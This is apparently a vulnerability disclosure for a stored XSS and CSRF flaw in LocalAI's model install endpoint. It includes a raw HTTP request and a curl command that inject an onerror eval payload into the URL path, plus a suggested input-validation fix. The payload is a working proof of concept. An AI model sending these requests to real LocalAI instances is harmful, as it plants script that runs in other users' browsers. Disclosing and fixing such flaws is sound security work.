LocalAI deleted model with storage XSS&SCRF vulnerability.When calling the delete model API and passing inappropriate parameters, it can cause a one-time storage XSS, which will trigger the payload when a user accesses the homepage.
Use the POST package below for payload storage.
POST /browse/install/model/<img src=x onerror=eval("alert(1)")> HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 0
HX-Request: true
HX-Current-URL: <http://127.0.0.1:8080/>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: <http://127.0.0.1:8080>
Referer: <http://127.0.0.1:8080/>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Then we can access the homepage to trigger the XSS.
On the console, it can be seen that CSRF also exists, and the active combination of XSS and CSRF is believed to achieve automatic triggering.
(The payload src param is "x" , just for test.)
Strictly control URL parameters, allowing only numbers, letters, and some special symbols.
curl -v -X POST "<http://127.0.0.1:8080/browse/install/model/><img src=x onerror=eval('alert(1)')>" \\
-H "Host: 127.0.0.1:8080" \\
-H "HX-Request: true" \\
-H "HX-Current-URL: <http://127.0.0.1:8080/>" \\
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" \\
-H "Content-Type: application/x-www-form-urlencoded" \\
-H "Accept: */*" \\
-H "Origin: <http://127.0.0.1:8080>" \\
-H "Referer: <http://127.0.0.1:8080/>" \\
-H "Accept-Encoding: gzip, deflate" \\
-H "Accept-Language: zh-CN,zh;q=0.9" \\
-H "Connection: close" \\
--data ""
1.This vulnerability allows for the storage and execution of malicious JavaScript code. 2.Automated malicious requests